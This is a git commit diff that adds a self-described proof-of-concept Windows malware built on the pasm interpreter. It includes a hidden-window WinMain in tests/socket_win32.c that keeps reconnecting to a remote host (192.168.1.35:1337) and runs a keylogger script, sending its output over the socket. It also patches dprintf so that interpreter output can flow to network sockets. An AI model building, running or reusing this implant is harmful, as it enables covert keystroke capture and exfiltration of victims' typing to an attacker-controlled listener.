add: POC of Windows malware that uses pasm interpreter

msvc/pasm.sln

@@ -10,6 +10,11 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "interpreter", "interpreter.
 		{6365D58B-DF8C-46B2-A93D-78D988A34FE8} = {6365D58B-DF8C-46B2-A93D-78D988A34FE8}
 	EndProjectSection
 EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "socket_usage", "socket_usage.vcxproj", "{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}"
+	ProjectSection(ProjectDependencies) = postProject
+		{6365D58B-DF8C-46B2-A93D-78D988A34FE8} = {6365D58B-DF8C-46B2-A93D-78D988A34FE8}
+	EndProjectSection
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|x64 = Debug|x64
@@ -34,6 +39,14 @@ Global
 		{6045F9D7-3A5E-406A-9949-7ABBB3BCBECC}.Release|x64.Build.0 = Release|x64
 		{6045F9D7-3A5E-406A-9949-7ABBB3BCBECC}.Release|x86.ActiveCfg = Release|Win32
 		{6045F9D7-3A5E-406A-9949-7ABBB3BCBECC}.Release|x86.Build.0 = Release|Win32
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Debug|x64.ActiveCfg = Debug|x64
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Debug|x64.Build.0 = Debug|x64
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Debug|x86.ActiveCfg = Debug|Win32
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Debug|x86.Build.0 = Debug|Win32
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Release|x64.ActiveCfg = Release|x64
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Release|x64.Build.0 = Release|x64
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Release|x86.ActiveCfg = Release|Win32
+		{FA2D5307-7B56-4B44-B0B4-DDE0394A3A75}.Release|x86.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

msvc/socket_usage.vcxproj

@@ -0,0 +1,162 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{fa2d5307-7b56-4b44-b0b4-dde0394a3a75}</ProjectGuid>
+    <RootNamespace>socketusage</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+    <LibraryPath>$(SolutionDir)$(Configuration);$(LibraryPath)</LibraryPath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <LibraryPath>$(SolutionDir)$(Configuration);$(LibraryPath)</LibraryPath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <LibraryPath>$(SolutionDir)$(Platform)\$(Configuration);$(LibraryPath)</LibraryPath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <LibraryPath>$(SolutionDir)$(Platform)\$(Configuration);$(LibraryPath)</LibraryPath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard_C>stdc17</LanguageStandard_C>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard_C>stdc17</LanguageStandard_C>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard_C>stdc17</LanguageStandard_C>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard_C>stdc17</LanguageStandard_C>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="..\tests\socket_win32.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\include\pasm.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

msvc/socket_usage.vcxproj.filters

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="src">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="include">
+      <UniqueIdentifier>{8f5448f2-e431-4e1a-ac1b-e625cee2ab76}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="..\tests\socket_win32.c">
+      <Filter>src</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\include\pasm.h">
+      <Filter>include</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>

msvc/socket_usage.vcxproj.user

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>

src/pasm.c

@@ -10,15 +10,25 @@ int fstream =  0;
 int pasm_debug_mode = 0;
 
 #ifdef _WIN32 // i swear i hate windows at this point
+#pragma comment(lib, "ws2_32.lib")
+
 #include <stdarg.h>
 #include <io.h>
+#include <winsock.h>
 
 int dprintf(int stream, const char * format, ...) {
   char buf[256] = {0}; //might overflow but whatever, fuck Windows
   va_list args;
   va_start(args, format);
   int wrote = vsprintf(buf, format, args);
-  _write(stream, buf, sizeof(buf));
+  struct sockaddr name = {0};
+  int len = 0;
+  if (getsockname(stream, &name, &len) == WSAENOTSOCK) {
+	  _write(stream, buf, sizeof(buf));
+  }
+  else {
+	  send(stream, buf, sizeof(buf), 0);
+  }
   va_end(args);
   return wrote;
 }

tests/socket_win32.c

@@ -0,0 +1,140 @@
+#include "../include/pasm.h"
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+#include <wininet.h>
+#include <winsock.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define BUFFER_SIZE 4096
+
+char** get_lines(char* str, int* count) {
+    // Check for null pointer
+    if (!str || !count) {
+        return 0;
+    }
+
+    // Count the number of lines
+    *count = 1;
+    for (char* p = str; *p; ++p) {
+        if (*p == '\r' && *(p + 1) == '\n') {
+            ++(*count);
+            ++p; // Skip '\n'
+        }
+    }
+
+    // Allocate memory for char** array
+    char** lines = (char**)malloc((*count + 1) * sizeof(char*));
+    if (!lines) {
+        // Handle allocation failure
+        return 0;
+    }
+
+    // Copy lines to char** array
+    int lineIndex = 0;
+    char* start = str;
+    for (char* p = str; *p; ++p) {
+        if (*p == '\r' && *(p + 1) == '\n') {
+            int lineLength = p - start;
+            lines[lineIndex] = (char*)malloc((lineLength + 1) * sizeof(char));
+            if (!lines[lineIndex]) {
+                // Handle allocation failure
+                // Free previously allocated memory
+                for (int i = 0; i < lineIndex; ++i) {
+                    free(lines[i]);
+                }
+                free(lines);
+                return 0;
+            }
+            strncpy(lines[lineIndex], start, lineLength);
+            lines[lineIndex][lineLength] = '\0'; // Null-terminate the line
+            ++lineIndex;
+            ++p; // Skip '\n'
+            start = p + 1; // Move to the next line
+        }
+    }
+
+    // Copy the last line
+    int lastLineLength = strlen(start);
+    lines[lineIndex] = (char*)malloc((lastLineLength + 1) * sizeof(char));
+    if (!lines[lineIndex]) {
+        // Handle allocation failure
+        // Free previously allocated memory
+        for (int i = 0; i <= lineIndex; ++i) {
+            free(lines[i]);
+        }
+        free(lines);
+        return 0;
+    }
+    strcpy(lines[lineIndex], start);
+    lines[*count] = 0; // Null-terminate the char** array
+
+    return lines;
+}
+
+int WinMain(
+  HINSTANCE hInstance,
+  HINSTANCE hPrevInstance,
+  LPSTR     lpCmdLine,
+  int       nShowCmd
+) {
+    int sock;
+    int first = 1;
+    struct sockaddr_in server;
+    char* server_reply = (char*)malloc(BUFFER_SIZE);
+    if (server_reply == NULL) {
+        return -1;
+    }
+
+    server.sin_family = AF_INET;
+    WORD wVersionRequested = MAKEWORD(2, 2);
+    WSADATA wsaData;
+    WSAStartup(wVersionRequested, &wsaData);
+
+retry:
+    if (!first) {
+        closesocket(sock);
+    }
+    else {
+        first = 0;
+    }
+
+    server.sin_addr.s_addr = inet_addr("192.168.1.35");
+    server.sin_port = htons(1337);
+
+    //Create socket
+    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (sock == -1) {
+        Sleep(500);
+        goto retry;
+    }
+
+    //Connect to remote server
+    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0)
+    {
+        //connect failed
+        Sleep(500);
+        goto retry;
+    }
+
+    //keep communicating with server
+    while (1)
+    {
+        memset(server_reply, 0, BUFFER_SIZE);
+
+        //Receive a reply from the server
+        if (recv(sock, server_reply, BUFFER_SIZE, 0) <= 0)
+        {
+            //recv failed
+            Sleep(500);
+            goto retry;
+        }
+
+		int lines = 0;
+		char **script = get_lines(server_reply, &lines);
+
+        printf("%d\n", pasm_run_script("../examples/keylogger.pasm", 0, 0, sock));
+    }
+    return 0;
+}